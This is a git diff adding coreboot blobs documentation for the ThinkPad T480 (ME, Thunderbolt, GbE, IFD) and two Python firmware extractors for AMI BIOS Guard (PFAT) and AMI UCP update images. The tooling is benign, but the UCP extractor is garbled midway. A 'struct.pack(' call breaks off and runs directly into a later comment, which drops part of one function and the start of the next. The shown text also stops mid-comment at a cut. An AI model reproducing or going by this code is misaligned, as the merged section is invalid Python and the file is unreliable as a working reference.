diff --git a/blobs/t480/.gitignore b/blobs/t480/.gitignore
new file mode 100644
index 00000000..a9b63f4a
--- /dev/null
+++ b/blobs/t480/.gitignore
@@ -0,0 +1,2 @@
+me.bin
+tb.bin
\ No newline at end of file
diff --git a/blobs/t480/README.md b/blobs/t480/README.md
new file mode 100644
index 00000000..2f7d1620
--- /dev/null
+++ b/blobs/t480/README.md
@@ -0,0 +1,13 @@
+# T480 Blobs
+
+Coreboot on the T480 requires the following binary blobs:
+
+- `me.bin` - Intel's Management Engine (ME) firmware, modified and deguarded using [me_cleaner](https://github.com/corna/me_cleaner) and [deguard](https://codeberg.org/libreboot/deguard) (written by Mate Kukri) to remove all but the modules necessary for the CPU to function.
+- `tb.bin` - Thunderbolt firmware.
+- `gbe.bin` - Hardware/software configuration data for the Gigabit Ethernet (GbE) controller.
+- `ifd_16.bin` - The Intel Flash Descriptor (IFD).
+
+Heads supplies an IFD and GbE blob, both copied from libreboot. We changed the MAC address of the GbE blob to `00:de:ad:c0:ff:ee` using [nvmutil](https://libreboot.org/docs/install/nvmutil.html), to support anonymity and build reproducibility.
+
+When building any T480 board variant with `make`, the build system will download a copy of the Intel ME. `me.bin` was extracted from a Dell Inspiron Windows firmware-update installer.
+
diff --git a/blobs/t480/biosutilities/.gitignore b/blobs/t480/biosutilities/.gitignore
new file mode 100644
index 00000000..238b83e2
--- /dev/null
+++ b/blobs/t480/biosutilities/.gitignore
@@ -0,0 +1,5 @@
+# Skip all external files
+external/*
+
+# Keep external > requirements file
+!external/requirements.txt
diff --git a/blobs/t480/biosutilities/AMI_PFAT_Extract.py b/blobs/t480/biosutilities/AMI_PFAT_Extract.py
new file mode 100644
index 00000000..026b74ae
--- /dev/null
+++ b/blobs/t480/biosutilities/AMI_PFAT_Extract.py
@@ -0,0 +1,319 @@
+#!/usr/bin/env python3
+#coding=utf-8
+
+"""
+AMI PFAT Extract
+AMI BIOS Guard Extractor
+Copyright (C) 2018-2022 Plato Mavropoulos
+"""
+
+TITLE = 'AMI BIOS Guard Extractor v4.0_a12'
+
+import os
+import re
+import sys
+import ctypes
+
+# Stop __pycache__ generation
+sys.dont_write_bytecode = True
+
+from common.externals import get_bgs_tool
+from common.num_ops import get_ordinal
+from common.path_ops import make_dirs, safe_name, get_extract_path, extract_suffix
+from common.patterns import PAT_AMI_PFAT
+from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t
+from common.system import printer
+from common.templates import BIOSUtility
+from common.text_ops import file_to_bytes
+
+class AmiBiosGuardHeader(ctypes.LittleEndianStructure):
+    _pack_ = 1
+    _fields_ = [
+        ('Size', uint32_t), # 0x00 Header + Entries
+        ('Checksum', uint32_t), # 0x04 ?
+        ('Tag', char*8), # 0x08 _AMIPFAT
+        ('Flags', uint8_t), # 0x10 ?
+ # 0x11 + ] + + def struct_print(self, p): + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Checksum:', f'0x{self.Checksum:04X}'], p, False) + printer(['Tag :', self.Tag.decode('utf-8')], p, False) + printer(['Flags :', f'0x{self.Flags:02X}'], p, False) + +class IntelBiosGuardHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('BGVerMajor', uint16_t), # 0x00 + ('BGVerMinor', uint16_t), # 0x02 + ('PlatformID', uint8_t*16), # 0x04 + ('Attributes', uint32_t), # 0x14 + ('ScriptVerMajor', uint16_t), # 0x16 + ('ScriptVerMinor', uint16_t), # 0x18 + ('ScriptSize', uint32_t), # 0x1C + ('DataSize', uint32_t), # 0x20 + ('BIOSSVN', uint32_t), # 0x24 + ('ECSVN', uint32_t), # 0x28 + ('VendorInfo', uint32_t), # 0x2C + # 0x30 + ] + + def get_platform_id(self): + id_byte = bytes(self.PlatformID) + + id_text = re.sub(r'[\n\t\r\x00 ]', '', id_byte.decode('utf-8','ignore')) + + id_hexs = f'{int.from_bytes(id_byte, "big"):0{0x10 * 2}X}' + id_guid = f'{{{id_hexs[:8]}-{id_hexs[8:12]}-{id_hexs[12:16]}-{id_hexs[16:20]}-{id_hexs[20:]}}}' + + return f'{id_text} {id_guid}' + + def get_flags(self): + attr = IntelBiosGuardHeaderGetAttributes() + attr.asbytes = self.Attributes + + return attr.b.SFAM, attr.b.ProtectEC, attr.b.GFXMitDis, attr.b.FTU, attr.b.Reserved + + def struct_print(self, p): + no_yes = ['No','Yes'] + f1,f2,f3,f4,f5 = self.get_flags() + + printer(['BIOS Guard Version :', f'{self.BGVerMajor}.{self.BGVerMinor}'], p, False) + printer(['Platform Identity :', self.get_platform_id()], p, False) + printer(['Signed Flash Address Map :', no_yes[f1]], p, False) + printer(['Protected EC OpCodes :', no_yes[f2]], p, False) + printer(['Graphics Security Disable :', no_yes[f3]], p, False) + printer(['Fault Tolerant Update :', no_yes[f4]], p, False) + printer(['Attributes Reserved :', f'0x{f5:X}'], p, False) + printer(['Script Version :', f'{self.ScriptVerMajor}.{self.ScriptVerMinor}'], p, False) + printer(['Script Size :', f'0x{self.ScriptSize:X}'], p, False) + printer(['Data Size :', f'0x{self.DataSize:X}'], p, False) + printer(['BIOS Security Version Number:', f'0x{self.BIOSSVN:X}'], p, False) + printer(['EC Security Version Number :', f'0x{self.ECSVN:X}'], p, False) + printer(['Vendor Information :', f'0x{self.VendorInfo:X}'], p, False) + +class IntelBiosGuardHeaderAttributes(ctypes.LittleEndianStructure): + _fields_ = [ + ('SFAM', uint32_t, 1), # Signed Flash Address Map + ('ProtectEC', uint32_t, 1), # Protected EC OpCodes + ('GFXMitDis', uint32_t, 1), # GFX Security Disable + ('FTU', uint32_t, 1), # Fault Tolerant Update + ('Reserved', uint32_t, 28) # Reserved/Unknown + ] + +class IntelBiosGuardHeaderGetAttributes(ctypes.Union): + _fields_ = [ + ('b', IntelBiosGuardHeaderAttributes), + ('asbytes', uint32_t) + ] + +class IntelBiosGuardSignature2k(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Unknown0', uint32_t), # 0x000 + ('Unknown1', uint32_t), # 0x004 + ('Modulus', uint32_t*64), # 0x008 + ('Exponent', uint32_t), # 0x108 + ('Signature', uint32_t*64), # 0x10C + # 0x20C + ] + + def struct_print(self, p): + Modulus = f'{int.from_bytes(self.Modulus, "little"):0{0x100 * 2}X}' + Signature = f'{int.from_bytes(self.Signature, "little"):0{0x100 * 2}X}' + + printer(['Unknown 0:', f'0x{self.Unknown0:X}'], p, False) + printer(['Unknown 1:', f'0x{self.Unknown1:X}'], p, False) + printer(['Modulus :', f'{Modulus[:32]} [...]'], p, False) + printer(['Exponent :', f'0x{self.Exponent:X}'], p, False) + printer(['Signature:', f'{Signature[:32]} [...]'], p, False) + +def 
is_ami_pfat(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(get_ami_pfat(input_buffer)) + +def get_ami_pfat(input_file): + input_buffer = file_to_bytes(input_file) + + match = PAT_AMI_PFAT.search(input_buffer) + + return input_buffer[match.start() - 0x8:] if match else b'' + +def get_file_name(index, name): + return safe_name(f'{index:02d} -- {name}') + +def parse_bg_script(script_data, padding=0): + is_opcode_div = len(script_data) % 8 == 0 + + if not is_opcode_div: + printer('Error: Script is not divisible by OpCode length!', padding, False) + + return 1 + + is_begin_end = script_data[:8] + script_data[-8:] == b'\x01' + b'\x00' * 7 + b'\xFF' + b'\x00' * 7 + + if not is_begin_end: + printer('Error: Script lacks Begin and/or End OpCodes!', padding, False) + + return 2 + + BigScript = get_bgs_tool() + + if not BigScript: + printer('Note: BIOS Guard Script Tool optional dependency is missing!', padding, False) + + return 3 + + script = BigScript(code_bytes=script_data).to_string().replace('\t',' ').split('\n') + + for opcode in script: + if opcode.endswith(('begin','end')): spacing = padding + elif opcode.endswith(':'): spacing = padding + 4 + else: spacing = padding + 12 + + operands = [operand for operand in opcode.split(' ') if operand] + printer(('{:<12s}' + '{:<11s}' * (len(operands) - 1)).format(*operands), spacing, False) + + return 0 + +def parse_pfat_hdr(buffer, padding=0): + block_all = [] + + pfat_hdr = get_struct(buffer, 0x0, AmiBiosGuardHeader) + + hdr_size = pfat_hdr.Size + hdr_data = buffer[PFAT_AMI_HDR_LEN:hdr_size] + hdr_text = hdr_data.decode('utf-8').splitlines() + + printer('AMI BIOS Guard Header:\n', padding) + + pfat_hdr.struct_print(padding + 4) + + hdr_title,*hdr_files = hdr_text + + files_count = len(hdr_files) + + hdr_tag,*hdr_indexes = hdr_title.split('II') + + printer(hdr_tag + '\n', padding + 4) + + bgt_indexes = [int(h, 16) for h in re.findall(r'.{1,4}', hdr_indexes[0])] if hdr_indexes else [] + + for index,entry in enumerate(hdr_files): + entry_parts = entry.split(';') + + info = entry_parts[0].split() + name = entry_parts[1] + + flags = int(info[0]) + param = info[1] + count = int(info[2]) + + order = get_ordinal((bgt_indexes[index] if bgt_indexes else index) + 1) + + desc = f'{name} (Index: {index + 1:02d}, Flash: {order}, Parameter: {param}, Flags: 0x{flags:X}, Blocks: {count})' + + block_all += [(desc, name, order, param, flags, index, i, count) for i in range(count)] + + _ = [printer(block[0], padding + 8, False) for block in block_all if block[6] == 0] + + return block_all, hdr_size, files_count + +def parse_pfat_file(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + pfat_buffer = get_ami_pfat(input_buffer) + + file_path = '' + all_blocks_dict = {} + + extract_name = os.path.basename(extract_path).rstrip(extract_suffix()) + + make_dirs(extract_path, delete=True) + + block_all,block_off,file_count = parse_pfat_hdr(pfat_buffer, padding) + + for block in block_all: + file_desc,file_name,_,_,_,file_index,block_index,block_count = block + + if block_index == 0: + printer(file_desc, padding + 4) + + file_path = os.path.join(extract_path, get_file_name(file_index + 1, file_name)) + + all_blocks_dict[file_index] = b'' + + block_status = f'{block_index + 1}/{block_count}' + + bg_hdr = get_struct(pfat_buffer, block_off, IntelBiosGuardHeader) + + printer(f'Intel BIOS Guard {block_status} Header:\n', padding + 8) + + bg_hdr.struct_print(padding + 12) + + bg_script_bgn = block_off + PFAT_BLK_HDR_LEN + 
bg_script_end = bg_script_bgn + bg_hdr.ScriptSize + bg_script_bin = pfat_buffer[bg_script_bgn:bg_script_end] + + bg_data_bgn = bg_script_end + bg_data_end = bg_data_bgn + bg_hdr.DataSize + bg_data_bin = pfat_buffer[bg_data_bgn:bg_data_end] + + block_off = bg_data_end # Assume next block starts at data end + + is_sfam,_,_,_,_ = bg_hdr.get_flags() # SFAM, ProtectEC, GFXMitDis, FTU, Reserved + + if is_sfam: + bg_sig_bgn = bg_data_end + bg_sig_end = bg_sig_bgn + PFAT_BLK_S2K_LEN + bg_sig_bin = pfat_buffer[bg_sig_bgn:bg_sig_end] + + if len(bg_sig_bin) == PFAT_BLK_S2K_LEN: + bg_sig = get_struct(bg_sig_bin, 0x0, IntelBiosGuardSignature2k) + + printer(f'Intel BIOS Guard {block_status} Signature:\n', padding + 8) + + bg_sig.struct_print(padding + 12) + + block_off = bg_sig_end # Adjust next block to start at data + signature end + + printer(f'Intel BIOS Guard {block_status} Script:\n', padding + 8) + + _ = parse_bg_script(bg_script_bin, padding + 12) + + with open(file_path, 'ab') as out_dat: + out_dat.write(bg_data_bin) + + all_blocks_dict[file_index] += bg_data_bin + + pfat_oob_data = pfat_buffer[block_off:] # Store out-of-bounds data after the end of PFAT files + + pfat_oob_name = get_file_name(file_count + 1, f'{extract_name}_OOB.bin') + + pfat_oob_path = os.path.join(extract_path, pfat_oob_name) + + with open(pfat_oob_path, 'wb') as out_oob: + out_oob.write(pfat_oob_data) + + if is_ami_pfat(pfat_oob_data): + parse_pfat_file(pfat_oob_data, get_extract_path(pfat_oob_path), padding) + + in_all_data = b''.join([block[1] for block in sorted(all_blocks_dict.items())]) + + in_all_name = get_file_name(0, f'{extract_name}_ALL.bin') + + in_all_path = os.path.join(extract_path, in_all_name) + + with open(in_all_path, 'wb') as out_all: + out_all.write(in_all_data + pfat_oob_data) + + return 0 + +PFAT_AMI_HDR_LEN = ctypes.sizeof(AmiBiosGuardHeader) +PFAT_BLK_HDR_LEN = ctypes.sizeof(IntelBiosGuardHeader) +PFAT_BLK_S2K_LEN = ctypes.sizeof(IntelBiosGuardSignature2k) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_ami_pfat, parse_pfat_file).run_utility() diff --git a/blobs/t480/biosutilities/AMI_UCP_Extract.py b/blobs/t480/biosutilities/AMI_UCP_Extract.py new file mode 100644 index 00000000..2f59e6fe --- /dev/null +++ b/blobs/t480/biosutilities/AMI_UCP_Extract.py @@ -0,0 +1,515 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +AMI UCP Extract +AMI UCP Update Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'AMI UCP Update Extractor v2.0_a20' + +import os +import re +import sys +import struct +import ctypes +import contextlib + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.checksums import get_chk_16 +from common.comp_efi import efi_decompress, is_efi_compressed +from common.path_ops import agnostic_path, make_dirs, safe_name, safe_path, get_extract_path +from common.patterns import PAT_AMI_UCP, PAT_INTEL_ENG +from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes, to_string + +from AMI_PFAT_Extract import is_ami_pfat, parse_pfat_file +from Insyde_IFD_Extract import insyde_ifd_extract, is_insyde_ifd + +class UafHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('ModuleTag', char*4), # 0x00 + ('ModuleSize', uint32_t), # 0x04 + ('Checksum', uint16_t), # 0x08 + ('Unknown0', uint8_t), # 0x0A + ('Unknown1', uint8_t), # 0x0A + ('Reserved', uint8_t*4), # 0x0C + # 0x10 + ] + + def _get_reserved(self): + 
res_bytes = bytes(self.Reserved) + + res_hex = f'0x{int.from_bytes(res_bytes, "big"):0{0x4 * 2}X}' + + res_str = re.sub(r'[\n\t\r\x00 ]', '', res_bytes.decode('utf-8','ignore')) + + res_txt = f' ({res_str})' if len(res_str) else '' + + return f'{res_hex}{res_txt}' + + def struct_print(self, p): + printer(['Tag :', self.ModuleTag.decode('utf-8')], p, False) + printer(['Size :', f'0x{self.ModuleSize:X}'], p, False) + printer(['Checksum :', f'0x{self.Checksum:04X}'], p, False) + printer(['Unknown 0 :', f'0x{self.Unknown0:02X}'], p, False) + printer(['Unknown 1 :', f'0x{self.Unknown1:02X}'], p, False) + printer(['Reserved :', self._get_reserved()], p, False) + +class UafModule(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('CompressSize', uint32_t), # 0x00 + ('OriginalSize', uint32_t), # 0x04 + # 0x08 + ] + + def struct_print(self, p, filename, description): + printer(['Compress Size:', f'0x{self.CompressSize:X}'], p, False) + printer(['Original Size:', f'0x{self.OriginalSize:X}'], p, False) + printer(['Filename :', filename], p, False) + printer(['Description :', description], p, False) + +class UiiHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('UIISize', uint16_t), # 0x00 + ('Checksum', uint16_t), # 0x02 + ('UtilityVersion', uint32_t), # 0x04 AFU|BGT (Unknown, Signed) + ('InfoSize', uint16_t), # 0x08 + ('SupportBIOS', uint8_t), # 0x0A + ('SupportOS', uint8_t), # 0x0B + ('DataBusWidth', uint8_t), # 0x0C + ('ProgramType', uint8_t), # 0x0D + ('ProgramMode', uint8_t), # 0x0E + ('SourceSafeRel', uint8_t), # 0x0F + # 0x10 + ] + + SBI = {1: 'ALL', 2: 'AMIBIOS8', 3: 'UEFI', 4: 'AMIBIOS8/UEFI'} + SOS = {1: 'DOS', 2: 'EFI', 3: 'Windows', 4: 'Linux', 5: 'FreeBSD', 6: 'MacOS', 128: 'Multi-Platform'} + DBW = {1: '16b', 2: '16/32b', 3: '32b', 4: '64b'} + PTP = {1: 'Executable', 2: 'Library', 3: 'Driver'} + PMD = {1: 'API', 2: 'Console', 3: 'GUI', 4: 'Console/GUI'} + + def struct_print(self, p, description): + SupportBIOS = self.SBI.get(self.SupportBIOS, f'Unknown ({self.SupportBIOS})') + SupportOS = self.SOS.get(self.SupportOS, f'Unknown ({self.SupportOS})') + DataBusWidth = self.DBW.get(self.DataBusWidth, f'Unknown ({self.DataBusWidth})') + ProgramType = self.PTP.get(self.ProgramType, f'Unknown ({self.ProgramType})') + ProgramMode = self.PMD.get(self.ProgramMode, f'Unknown ({self.ProgramMode})') + + printer(['UII Size :', f'0x{self.UIISize:X}'], p, False) + printer(['Checksum :', f'0x{self.Checksum:04X}'], p, False) + printer(['Tool Version :', f'0x{self.UtilityVersion:08X}'], p, False) + printer(['Info Size :', f'0x{self.InfoSize:X}'], p, False) + printer(['Supported BIOS:', SupportBIOS], p, False) + printer(['Supported OS :', SupportOS], p, False) + printer(['Data Bus Width:', DataBusWidth], p, False) + printer(['Program Type :', ProgramType], p, False) + printer(['Program Mode :', ProgramMode], p, False) + printer(['SourceSafe Tag:', f'{self.SourceSafeRel:02d}'], p, False) + printer(['Description :', description], p, False) + +class DisHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('PasswordSize', uint16_t), # 0x00 + ('EntryCount', uint16_t), # 0x02 + ('Password', char*12), # 0x04 + # 0x10 + ] + + def struct_print(self, p): + printer(['Password Size:', f'0x{self.PasswordSize:X}'], p, False) + printer(['Entry Count :', self.EntryCount], p, False) + printer(['Password :', self.Password.decode('utf-8')], p, False) + +class DisModule(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('EnabledDisabled', uint8_t), # 0x00 + ('ShownHidden', 
uint8_t), # 0x01 + ('Command', char*32), # 0x02 + ('Description', char*256), # 0x22 + # 0x122 + ] + + ENDIS = {0: 'Disabled', 1: 'Enabled'} + SHOWN = {0: 'Hidden', 1: 'Shown', 2: 'Shown Only'} + + def struct_print(self, p): + EnabledDisabled = self.ENDIS.get(self.EnabledDisabled, f'Unknown ({self.EnabledDisabled})') + ShownHidden = self.SHOWN.get(self.ShownHidden, f'Unknown ({self.ShownHidden})') + + printer(['State :', EnabledDisabled], p, False) + printer(['Display :', ShownHidden], p, False) + printer(['Command :', self.Command.decode('utf-8').strip()], p, False) + printer(['Description:', self.Description.decode('utf-8').strip()], p, False) + +# Validate UCP Module Checksum-16 +def chk16_validate(data, tag, padd=0): + if get_chk_16(data) != 0: + printer(f'Error: Invalid UCP Module {tag} Checksum!', padd, pause=True) + else: + printer(f'Checksum of UCP Module {tag} is valid!', padd) + +# Check if input is AMI UCP image +def is_ami_ucp(in_file): + buffer = file_to_bytes(in_file) + + return bool(get_ami_ucp(buffer)[0] is not None) + +# Get all input file AMI UCP patterns +def get_ami_ucp(in_file): + buffer = file_to_bytes(in_file) + + uaf_len_max = 0x0 # Length of largest detected @UAF|@HPU + uaf_buf_bin = None # Buffer of largest detected @UAF|@HPU + uaf_buf_tag = '@UAF' # Tag of largest detected @UAF|@HPU + + for uaf in PAT_AMI_UCP.finditer(buffer): + uaf_len_cur = int.from_bytes(buffer[uaf.start() + 0x4:uaf.start() + 0x8], 'little') + + if uaf_len_cur > uaf_len_max: + uaf_len_max = uaf_len_cur + uaf_hdr_off = uaf.start() + uaf_buf_bin = buffer[uaf_hdr_off:uaf_hdr_off + uaf_len_max] + uaf_buf_tag = uaf.group(0)[:4].decode('utf-8','ignore') + + return uaf_buf_bin, uaf_buf_tag + +# Get list of @UAF|@HPU Modules +def get_uaf_mod(buffer, uaf_off=0x0): + uaf_all = [] # Initialize list of all @UAF|@HPU Modules + + while buffer[uaf_off] == 0x40: # ASCII of @ is 0x40 + uaf_hdr = get_struct(buffer, uaf_off, UafHeader) # Parse @UAF|@HPU Module Structure + + uaf_tag = uaf_hdr.ModuleTag.decode('utf-8') # Get unique @UAF|@HPU Module Tag + + uaf_all.append([uaf_tag, uaf_off, uaf_hdr]) # Store @UAF|@HPU Module Info + + uaf_off += uaf_hdr.ModuleSize # Adjust to next @UAF|@HPU Module offset + + if uaf_off >= len(buffer): + break # Stop parsing at EOF + + # Check if @UAF|@HPU Module @NAL exists and place it first + # Parsing @NAL first allows naming all @UAF|@HPU Modules + for mod_idx,mod_val in enumerate(uaf_all): + if mod_val[0] == '@NAL': + uaf_all.insert(1, uaf_all.pop(mod_idx)) # After UII for visual purposes + + break # @NAL found, skip the rest + + return uaf_all + +# Parse & Extract AMI UCP structures +def ucp_extract(in_file, extract_path, padding=0, checksum=False): + input_buffer = file_to_bytes(in_file) + + nal_dict = {} # Initialize @NAL Dictionary per UCP + + printer('Utility Configuration Program', padding) + + make_dirs(extract_path, delete=True) + + # Get best AMI UCP Pattern match based on @UAF|@HPU Size + ucp_buffer,ucp_tag = get_ami_ucp(input_buffer) + + uaf_hdr = get_struct(ucp_buffer, 0, UafHeader) # Parse @UAF|@HPU Header Structure + + printer(f'Utility Auxiliary File > {ucp_tag}:\n', padding + 4) + + uaf_hdr.struct_print(padding + 8) + + fake = struct.pack(' @UAF|@HPU Module/Section +def uaf_extract(buffer, extract_path, mod_info, padding=0, checksum=False, nal_dict=None): + if nal_dict is None: + nal_dict = {} + + uaf_tag,uaf_off,uaf_hdr = mod_info + + uaf_data_all = buffer[uaf_off:uaf_off + uaf_hdr.ModuleSize] # @UAF|@HPU Module Entire Data + + uaf_data_mod = 
uaf_data_all[UAF_HDR_LEN:] # @UAF|@HPU Module EFI Data + + uaf_data_raw = uaf_data_mod[UAF_MOD_LEN:] # @UAF|@HPU Module Raw Data + + printer(f'Utility Auxiliary File > {uaf_tag}:\n', padding) + + uaf_hdr.struct_print(padding + 4) # Print @UAF|@HPU Module Info + + uaf_mod = get_struct(buffer, uaf_off + UAF_HDR_LEN, UafModule) # Parse UAF Module EFI Structure + + is_comp = uaf_mod.CompressSize != uaf_mod.OriginalSize # Detect @UAF|@HPU Module EFI Compression + + if uaf_tag in nal_dict: + uaf_name = nal_dict[uaf_tag][1] # Always prefer @NAL naming first + elif uaf_tag in UAF_TAG_DICT: + uaf_name = UAF_TAG_DICT[uaf_tag][0] # Otherwise use built-in naming + elif uaf_tag == '@ROM': + uaf_name = 'BIOS.bin' # BIOS/PFAT Firmware (w/o Signature) + elif uaf_tag.startswith('@R0'): + uaf_name = f'BIOS_0{uaf_tag[3:]}.bin' # BIOS/PFAT Firmware + elif uaf_tag.startswith('@S0'): + uaf_name = f'BIOS_0{uaf_tag[3:]}.sig' # BIOS/PFAT Signature + elif uaf_tag.startswith('@DR'): + uaf_name = f'DROM_0{uaf_tag[3:]}.bin' # Thunderbolt Retimer Firmware + elif uaf_tag.startswith('@DS'): + uaf_name = f'DROM_0{uaf_tag[3:]}.sig' # Thunderbolt Retimer Signature + elif uaf_tag.startswith('@EC'): + uaf_name = f'EC_0{uaf_tag[3:]}.bin' # Embedded Controller Firmware + elif uaf_tag.startswith('@ME'): + uaf_name = f'ME_0{uaf_tag[3:]}.bin' # Management Engine Firmware + else: + uaf_name = uaf_tag # Could not name the @UAF|@HPU Module, use Tag instead + + uaf_fext = '' if uaf_name != uaf_tag else '.bin' + + uaf_fdesc = UAF_TAG_DICT[uaf_tag][1] if uaf_tag in UAF_TAG_DICT else uaf_name + + uaf_mod.struct_print(padding + 4, uaf_name + uaf_fext, uaf_fdesc) # Print @UAF|@HPU Module EFI Info + + # Check if unknown @UAF|@HPU Module Tag is present in @NAL but not in built-in dictionary + if uaf_tag in nal_dict and uaf_tag not in UAF_TAG_DICT and not uaf_tag.startswith(('@ROM','@R0','@S0','@DR','@DS')): + printer(f'Note: Detected new AMI UCP Module {uaf_tag} ({nal_dict[uaf_tag][1]}) in @NAL!', padding + 4, pause=True) + + # Generate @UAF|@HPU Module File name, depending on whether decompression will be required + uaf_sname = safe_name(uaf_name + ('.temp' if is_comp else uaf_fext)) + if uaf_tag in nal_dict: + uaf_npath = safe_path(extract_path, nal_dict[uaf_tag][0]) + make_dirs(uaf_npath, exist_ok=True) + uaf_fname = safe_path(uaf_npath, uaf_sname) + else: + uaf_fname = safe_path(extract_path, uaf_sname) + + if checksum: + chk16_validate(uaf_data_all, uaf_tag, padding + 4) + + # Parse Utility Identification Information @UAF|@HPU Module (@UII) + if uaf_tag == '@UII': + info_hdr = get_struct(uaf_data_raw, 0, UiiHeader) # Parse @UII Module Raw Structure + + info_data = uaf_data_raw[max(UII_HDR_LEN,info_hdr.InfoSize):info_hdr.UIISize] # @UII Module Info Data + + # Get @UII Module Info/Description text field + info_desc = info_data.decode('utf-8','ignore').strip('\x00 ') + + printer('Utility Identification Information:\n', padding + 4) + + info_hdr.struct_print(padding + 8, info_desc) # Print @UII Module Info + + if checksum: + chk16_validate(uaf_data_raw, '@UII > Info', padding + 8) + + # Store/Save @UII Module Info in file + with open(uaf_fname[:-4] + '.txt', 'a', encoding='utf-8') as uii_out: + with contextlib.redirect_stdout(uii_out): + info_hdr.struct_print(0, info_desc) # Store @UII Module Info + + # Adjust @UAF|@HPU Module Raw Data for extraction + if is_comp: + # Some Compressed @UAF|@HPU Module EFI data lack necessary EOF padding + if uaf_mod.CompressSize > len(uaf_data_raw): + comp_padd = b'\x00' * (uaf_mod.CompressSize - 
len(uaf_data_raw)) + uaf_data_raw = uaf_data_mod[:UAF_MOD_LEN] + uaf_data_raw + comp_padd # Add missing padding for decompression + else: + uaf_data_raw = uaf_data_mod[:UAF_MOD_LEN] + uaf_data_raw # Add the EFI/Tiano Compression info before Raw Data + else: + uaf_data_raw = uaf_data_raw[:uaf_mod.OriginalSize] # No compression, extend to end of Original @UAF|@HPU Module size + + # Store/Save @UAF|@HPU Module file + if uaf_tag != '@UII': # Skip @UII binary, already parsed + with open(uaf_fname, 'wb') as uaf_out: + uaf_out.write(uaf_data_raw) + + # @UAF|@HPU Module EFI/Tiano Decompression + if is_comp and is_efi_compressed(uaf_data_raw, False): + dec_fname = uaf_fname.replace('.temp', uaf_fext) # Decompressed @UAF|@HPU Module file path + + if efi_decompress(uaf_fname, dec_fname, padding + 4) == 0: + with open(dec_fname, 'rb') as dec: + uaf_data_raw = dec.read() # Read back the @UAF|@HPU Module decompressed Raw data + + os.remove(uaf_fname) # Successful decompression, delete compressed @UAF|@HPU Module file + + uaf_fname = dec_fname # Adjust @UAF|@HPU Module file path to the decompressed one + + # Process and Print known text only @UAF|@HPU Modules (after EFI/Tiano Decompression) + if uaf_tag in UAF_TAG_DICT and UAF_TAG_DICT[uaf_tag][2] == 'Text': + printer(f'{UAF_TAG_DICT[uaf_tag][1]}:', padding + 4) + printer(uaf_data_raw.decode('utf-8','ignore'), padding + 8) + + # Parse Default Command Status @UAF|@HPU Module (@DIS) + if len(uaf_data_raw) and uaf_tag == '@DIS': + dis_hdr = get_struct(uaf_data_raw, 0x0, DisHeader) # Parse @DIS Module Raw Header Structure + + printer('Default Command Status Header:\n', padding + 4) + + dis_hdr.struct_print(padding + 8) # Print @DIS Module Raw Header Info + + # Store/Save @DIS Module Header Info in file + with open(uaf_fname[:-3] + 'txt', 'a', encoding='utf-8') as dis: + with contextlib.redirect_stdout(dis): + dis_hdr.struct_print(0) # Store @DIS Module Header Info + + dis_data = uaf_data_raw[DIS_HDR_LEN:] # @DIS Module Entries Data + + # Parse all @DIS Module Entries + for mod_idx in range(dis_hdr.EntryCount): + dis_mod = get_struct(dis_data, mod_idx * DIS_MOD_LEN, DisModule) # Parse @DIS Module Raw Entry Structure + + printer(f'Default Command Status Entry {mod_idx + 1:02d}/{dis_hdr.EntryCount:02d}:\n', padding + 8) + + dis_mod.struct_print(padding + 12) # Print @DIS Module Raw Entry Info + + # Store/Save @DIS Module Entry Info in file + with open(uaf_fname[:-3] + 'txt', 'a', encoding='utf-8') as dis: + with contextlib.redirect_stdout(dis): + printer() + dis_mod.struct_print(4) # Store @DIS Module Entry Info + + os.remove(uaf_fname) # Delete @DIS Module binary, info exported as text + + # Parse Name List @UAF|@HPU Module (@NAL) + if len(uaf_data_raw) >= 5 and (uaf_tag,uaf_data_raw[0],uaf_data_raw[4]) == ('@NAL',0x40,0x3A): + nal_info = uaf_data_raw.decode('utf-8','ignore').replace('\r','').strip().split('\n') + + printer('AMI UCP Module Name List:\n', padding + 4) + + # Parse all @NAL Module Entries + for info in nal_info: + info_tag,info_value = info.split(':',1) + + printer(f'{info_tag} : {info_value}', padding + 8, False) # Print @NAL Module Tag-Path Info + + info_part = agnostic_path(info_value).parts # Split OS agnostic path in parts + info_path = to_string(info_part[1:-1], os.sep) # Get path without drive/root or file + info_name = info_part[-1] # Get file from last path part + + nal_dict[info_tag] = (info_path,info_name) # Assign a file path & name to each Tag + + # Parse Insyde BIOS @UAF|@HPU Module (@INS) + if uaf_tag == '@INS' and 
is_insyde_ifd(uaf_fname): + ins_dir = os.path.join(extract_path, safe_name(f'{uaf_tag}_nested-IFD')) # Generate extraction directory + + if insyde_ifd_extract(uaf_fname, get_extract_path(ins_dir), padding + 4) == 0: + os.remove(uaf_fname) # Delete raw nested Insyde IFD image after successful extraction + + # Detect & Unpack AMI BIOS Guard (PFAT) BIOS image + if is_ami_pfat(uaf_data_raw): + pfat_dir = os.path.join(extract_path, safe_name(uaf_name)) + + parse_pfat_file(uaf_data_raw, get_extract_path(pfat_dir), padding + 4) + + os.remove(uaf_fname) # Delete raw PFAT BIOS image after successful extraction + + # Detect Intel Engine firmware image and show ME Analyzer advice + if uaf_tag.startswith('@ME') and PAT_INTEL_ENG.search(uaf_data_raw): + printer('Intel Management Engine (ME) Firmware:\n', padding + 4) + printer('Use "ME Analyzer" from https://github.com/platomav/MEAnalyzer', padding + 8, False) + + # Parse Nested AMI UCP image + if is_ami_ucp(uaf_data_raw): + uaf_dir = os.path.join(extract_path, safe_name(f'{uaf_tag}_nested-UCP')) # Generate extraction directory + + ucp_extract(uaf_data_raw, get_extract_path(uaf_dir), padding + 4, checksum) # Call recursively + + os.remove(uaf_fname) # Delete raw 